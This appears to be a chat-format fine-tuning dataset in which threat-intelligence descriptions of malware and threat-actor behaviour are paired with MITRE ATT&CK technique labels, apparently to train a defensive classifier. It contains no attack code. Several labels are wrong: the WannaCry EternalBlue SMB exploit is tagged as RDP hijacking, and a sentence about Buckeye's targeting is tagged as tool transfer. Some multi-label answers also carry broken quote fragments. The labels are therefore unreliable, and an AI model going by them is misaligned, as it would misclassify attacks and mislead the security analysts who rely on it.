- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN7 has conducted broad phishing campaigns using malicious links."
- },
- {
- "role": "assistant",
- "content": "T1566.002 - Phishing: Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Penquin can report the IP of the compromised host to attacker controlled infrastructure."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CosmicDuke searches for Microsoft Outlook data files with extensions .pst and .ost for collection and exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1114.001 - Email Collection: Local Email Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "yty collects files with the following extensions: .ppt, .pptx, .pdf, .doc, .docx, .xls, .xlsx, .docm, .rtf, .inp, .xlsm, .csv, .odt, .pps, .vcf and sends them back to the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Further into the infection process, the malware chooses a service name randomly from netsvc in order to use it for the payload creation path. The malware then creates a file named bcdbootinfo.tlp in the system folder containing the infection time and the random service name that is chosen"
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MacMa has downloaded additional files, including an exploit for used privilege escalation."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sandworm Team has delivered malicious Microsoft Office attachments via spearphishing emails."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Caterpillar WebShell has a module to download and upload files to the system."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Okrum's installer can attempt to achieve persistence by creating a scheduled task."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses a list of known credentials gathered through credential dumping to guess passwords to accounts as it spreads throughout a network."
- },
- {
- "role": "assistant",
- "content": "T1110 - Brute Force"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Naikon uses commands such as \"netsh interface show\" to discover network interface settings."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SideCopy has executed malware by calling the API function `CreateProcessW`."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sandworm Team has obtained valid emails addresses while conducting research against target organizations that were subsequently used in spearphishing campaigns."
- },
- {
- "role": "assistant",
- "content": "T1589.002 - Email Addresses"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Wocao, threat actors staged archived files in a temporary directory prior to exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Strike's \"beacon\" payload is capable of capturing screenshots."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The communication between the malware and the server is based on the HTTP protocol and slightly varies between the samples. Every few seconds the backdoor sends a POST request to the C&C URL. The result is encrypted and sent back to another URL on the server as the parameter of a POST request"
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "48b9e25491e088a35105274cae0b9e67 MD5 hash of the current timestamp calculated during execution. MD5 hash of the current timestamp calculated during execution. 5-15 Lower/upper limits used to randomly generate sleep times as SUNSHUTTLE executes - Lower/upper limits used to randomly generate sleep times as SUNSHUTTLE executes - 0 0 or 1 — Utilize “blend-in” traffic requests. Internally called “false_requesting” - 0 Activate execution timestamp (0 by default) — execution \"activates\" or continues if current time is greater than the value in the configuration - Activate execution timestamp (0 by default) — execution \"activates\" or continues if current time is greater than the value in the configuration - - Base64-encoded User-agent used in HTTPS requests"
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Trojan will attempt to inject code into these browsers to carry out its C2 communications. To carry out C2 communications via injected code in a remote process, the injected code reaches out to the C2 server and saves the response to a memory mapped file named SNFIRNW. Command and Control Communications In addition to being able to communicate with its C2 server from code injected into a web browser, the Trojan can also carry out the same communication process within its own process"
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols', 'T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OSX_OCEANLOTUS.D has changed permissions of a second-stage payload to an executable via \"chmod\"."
- },
- {
- "role": "assistant",
- "content": "T1222.002 - File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DarkWatchman can use `cmd.exe` to execute commands."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chaos provides a reverse shell connection on 8338/TCP, encrypted via AES."
- },
- {
- "role": "assistant",
- "content": "T1059.004 - Command and Scripting Interpreter: Bash', 'T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chaes has been delivered by sending victims a phishing email containing a malicious .docx file."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Prior to privilege escalation, Egregor proceeds to Active Directory reconnaissance using tools such as Sharphound or AdFind. These tools are used to gather information about users, groups, computers, and so on"
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery', 'T1069.002 - Permission Groups Discovery: Domain Groups"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "leveraged the DDE protocol to deliver their malware."
- },
- {
- "role": "assistant",
- "content": "T1559.002 - Inter-Process Communication: Dynamic Data Exchange"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lizar can collect the username from the system."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Darkhotel malware has used a series of checks to determine if it's being analyzed; checks include the length of executable names, if a filename ends with \".Md5.exe\", and if the program is executed from the root of the C:\\ drive, as well as checks for sandbox-related libraries."
- },
- {
- "role": "assistant",
- "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pysa has used Powershell scripts to deploy its ransomware."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "enables the Remote Desktop Protocol for persistence."
- },
- {
- "role": "assistant",
- "content": "T1021.001 - Remote Services: Remote Desktop Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It also turns off the Windows Security Center service to prevent alerting the user about the disabled firewall"
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "UNC2452 has used GoldFinder to perform HTTP GET requests to check internet connectivity and identify HTTP proxy servers and other redirectors that an HTTP request travels through."
- },
- {
- "role": "assistant",
- "content": "T1016.001 - System Network Configuration Discovery: Internet Connection Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Malware used by can run commands on the command-line interface."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Symantec determined a more accurate picture of Buckeye’s targets by looking at where Buckeye remained active on the network longer than a day, deployed additional tools, and spread onto multiple computers"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Upon execution, MCMD spawns a console process (cmd.exe) with redirected standard input and output (I/O) handles. Immediately after execution, the window properties of both the MCMD and cmd.exe processes are modified to prevent them from being visible on the active user's desktop. MCMD utilizes the shared I/O handles to send and receive data between the C2 server and the command shell (see Figure 1"
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell', 'T1564.003 - Hide Artifacts: Hidden Window"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Misdat has collected files and data from a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "These files are downloaded to a directory (C:\\Users\\Public\\Libraries\\tempsys) on the infected machine by Bxaki() and xparis()"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An uptick in activity from GRIM SPIDER, a subgroup of the criminal enterprise CrowdStrike Intelligence tracks as WIZARD SPIDER, has led to the identification of consistent actions employed to carry out their attacks. As part of their initial compromise — usually as a download from a spam email — they gain a foothold with their modular TrickBot malware, which was developed and is principally operated by WIZARD SPIDER. Once TrickBot is executed, new enumeration modules are downloaded onto the compromised machine to facilitate WIZARD SPIDER’s spread in search of credentials with the aim of gaining access to the domain controller. The criminal actors use RDP to perform lateral movement and explore the victim environment, with an end result of gaining access to the domain controller. Once this access has been achieved, GRIM SPIDER is able to deploy the Ryuk ransomware to the entire network. These observations come from system log data, CrowdStrike Falcon® sensor telemetry, and the output of the Falcon Forensic Collector (a customized version of CrowdStrike’s freely distributed community tool, CrowdResponse"
- },
- {
- "role": "assistant",
- "content": "T1570 - Lateral Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Small Sieve can use a custom hex byte swapping encoding scheme to obfuscate tasking traffic."
- },
- {
- "role": "assistant",
- "content": "T1132.002 - Non-Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "One version of Helminth consists of VBScript scripts."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gold Dragon terminates anti-malware processes if they’re found running on the system."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The exploit used, named EternalBlue, exploits a vulnerability in the Server Message Block (SMB) protocol which allows the malware to spread to all unpatched Windows systems from XP to 2016 on a network that have this protocol enabled. This vulnerability allows remote code execution over SMB v1. WannaCry utilizes this exploit by crafting a custom SMB session request with hard-coded values based on the target system. Notably, after the first SMB packet sent to the victim’s IP address, the malware sends two additional packets to the victim containing the hard-coded IP addresses 192.168.56.20 and 172.16.99.5"
- },
- {
- "role": "assistant",
- "content": "T1563.002 - Remote Service Session Hijacking: RDP Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "While PotPlayerDB.dat is a variant of PlugX malware, TA416 has updated the payload by changing both its encoding method and expanding the payload’s configuration capabilities. Historically, TA416 relied on the DLL launcher to decode the PlugX payload utilizing an XOR key included at the offset 0 within the PlugX DAT configuration file. One of the main ways it does this is by resolving API functions during runtime. This iteration of PlugX does standard API hashing, but only to resolve the address of the functions GetProcAddress as well as LoadLibrary. Once those functions are resolved properly, it loads the rest of the functions via their text name"
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Successful execution of the macro within the malicious document results in the installation of APT28’s signature GAMEFISH malware"
- },
- {
- "role": "assistant",
- "content": "T1204 - User Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dtrack can collect a variety of information from victim machines."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "malware WhiskeyDelta-Two contains a function that attempts to rename the administrator’s account."
- },
- {
- "role": "assistant",
- "content": "T1098 - Account Manipulation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Wocao, threat actors used stolen credentials to connect to the victim's network via VPN."
- },
- {
- "role": "assistant",
- "content": "T1133 - External Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ROKRAT can use `VirtualAlloc`, `WriteProcessMemory`, and then `CreateRemoteThread` to execute shellcode within the address space of `Notepad.exe`."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Since the 2016 publication, Microsoft has come across an evolution of PLATINUM’s file-transfer tool, one that uses the Intel® Active Management Technology (AMT) Serial-over-LAN (SOL) channel for communication"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ramsay has included embedded Visual Basic scripts in malicious documents."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can perform DLL loading."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NOBELIUM has been observed modifying Azure AD to enable long-term persistence and access to sensitive information. This can include the creation of users, consent of Azure AD applications, granting of roles to users and applications, creation of additional service principal credentials, and more. In one incident, MSTIC observed the use of Azure RunCommand, paired with Azure admin-on-behalf-of (AOBO), as a technique to gain access to virtual machines and shift access from cloud to on-premise. NOBELIUM has demonstrated an ongoing interest in targeting privileged users, including Global Administrators. NOBELIUM is frequently observed conducting activities consistent with intelligence collection"
- },
- {
- "role": "assistant",
- "content": "T1087.004 - Cloud Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lokibot has the ability to discover the domain name of the infected host."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mandiant initially identified an early variant of the POSHSPY backdoor deployed as PowerShell scripts during an incident response engagement in 2015"
- },
- {
- "role": "assistant",
- "content": "T1546.013 - Event Triggered Execution: PowerShell Profile', 'T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "deletes the original dropped file from the victim."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "menuPass has used a global service provider's IP as a proxy for C2 traffic from a victim."
- },
- {
- "role": "assistant",
- "content": "T1090.002 - External Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "STARWHALE can establish persistence by installing itself in the startup folder, whereas the GO variant has created a `HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\OutlookM` registry key."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KONNI can steal profiles (containing credential information) from Firefox, Chrome, and Opera."
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping', 'T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Several tools encode data with base64 when posting it to a C2 server."
- },
- {
- "role": "assistant",
- "content": "T1132 - Data Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SysUpdate can manage services and processes."
- },
- {
- "role": "assistant",
- "content": "T1569.002 - System Services: Service Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly 2.0 used PowerShell scripts for execution."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KONNI has used parent PID spoofing to spawn a new `cmd` process using `CreateProcessW` and a handle to `Taskmgr.exe`."
- },
- {
- "role": "assistant",
- "content": "T1134.004 - Access Token Manipulation: Parent PID Spoofing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Open malspam with password-protected ZIP attachment. On June 30 and July 1, 2020, we saw indications there may also have been a link to download a ZIP archive instead of an attachment. Extract Microsoft Word document from the password-protected ZIP archive using a unique password from the message text"
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Astaroth logs keystrokes from the victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chimera has used \"net share\" and \"net view\" to identify network shares of interest."
- },
- {
- "role": "assistant",
- "content": "T1135 - Network Share Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Diavol has obfuscated its main code routines within bitmap images as part of its anti-analysis techniques."
- },
- {
- "role": "assistant",
- "content": "T1027.003 - Steganography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Proxysvc performs data exfiltration over the control server channel using a custom protocol."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "concatenates then decompresses multiple resources to load an embedded .Net Framework assembly."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TeamTNT has established tmate sessions for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1219 - Remote Access Software"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During its initial execution, extracts operating system information from the infected host."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "conducts credential dumping on victims, with a focus on obtaining credentials belonging to domain and database servers."
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CSPY Downloader has been packed with UPX."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
